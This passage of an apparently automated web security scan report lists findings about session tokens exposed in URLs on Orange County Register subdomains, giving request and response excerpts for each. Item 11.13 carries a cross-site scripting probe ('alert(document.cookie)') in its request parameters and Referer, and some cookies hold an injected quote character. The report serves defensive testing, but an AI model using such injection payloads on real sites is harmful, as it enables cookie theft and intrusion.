<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "HSBC" c/o "Neo
...[SNIP]...
<img src="https://ad.yieldmanager.com/pixel?id=1012943&id=1012994&id=103362&t=2" width="1" height="1" /><img src="https://bh.contextweb.com/bh/set.aspx?action=add&advid=522&token=HSBC1" width="1" height="1" border="0"></body>
...[SNIP]...

11.10. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 128370


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.11. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:43 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.12. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:54 +0000
Cache-Control: max-age=245, must-revalidate
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 84762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.13. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&hostname=www.superpages.com&location=%2Fbp%2Fxmlproxyf53dc%2522-alert(document.cookie)-%2522b9a871a93d9&url=http%3A%2F%2Fwww.superpages.com%2Fbp%2Fxmlproxyf53dc%2522-alert(document.cookie)-%2522b9a871a93d9%3Furl%3Dhttp%253A%252F%252Fugc-int.superpages.com%252Fugcwiki%252FGetPhotoServlet%253FlistingId%253D2118363360&sessionID=1296749501634.96680&fpc=c5114f2-12dec4b1cc4-7f15d273-1&ts1296749504819.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=burp&refQuery=http%3A%2F%2Fburp%2Fshow%2F42 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 03 Feb 2011 16:11:22 GMT
Connection: keep-alive


11.14. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:57 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.15. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:05:33 +0000
Cache-Control: max-age=279, must-revalidate
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 53064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.16. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:32 +0000
Cache-Control: max-age=91, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 115709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.17. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:27 +0000
Cache-Control: max-age=206, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 101944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.18. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/orange-county-property/98182/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:02 +0000
Cache-Control: max-age=61, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 140260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.19. http://lansner.ocregister.com/category/outlooks/eyeball-11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /category/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.20. http://mortgage.ocregister.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:07:07 +0000
Cache-Control: max-age=294, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html
Content-Length: 99712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.21. http://mortgage.ocregister.com/2007/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.22. http://mortgage.ocregister.com/2007/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.23. http://mortgage.ocregister.com/2007/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.24. http://mortgage.ocregister.com/2007/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.25. http://mortgage.ocregister.com/2007/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.26. http://mortgage.ocregister.com/2007/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.27. http://mortgage.ocregister.com/2007/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.28. http://mortgage.ocregister.com/2007/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.29. http://mortgage.ocregister.com/2007/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

